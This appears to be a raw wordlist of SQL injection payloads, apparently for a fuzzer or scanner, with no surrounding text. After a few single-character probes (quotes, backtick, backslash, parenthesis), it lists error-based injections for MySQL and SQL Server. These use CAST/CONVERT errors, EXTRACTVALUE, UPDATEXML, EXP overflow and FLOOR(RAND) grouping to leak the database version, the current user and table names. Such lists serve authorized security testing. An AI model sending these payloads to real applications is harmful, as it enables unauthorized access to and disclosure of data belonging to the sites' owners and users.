'
"
`
' OR 1=CAST((SELECT @@version) AS INT)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
1 AND EXP(~(SELECT * FROM (SELECT USER()) x))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT VERSION())),1)--
1' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
1' AND 1=CONVERT(int,(SELECT @@version))--
' OR EXTRACTVALUE(1,CONCAT(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 1)))--
\
)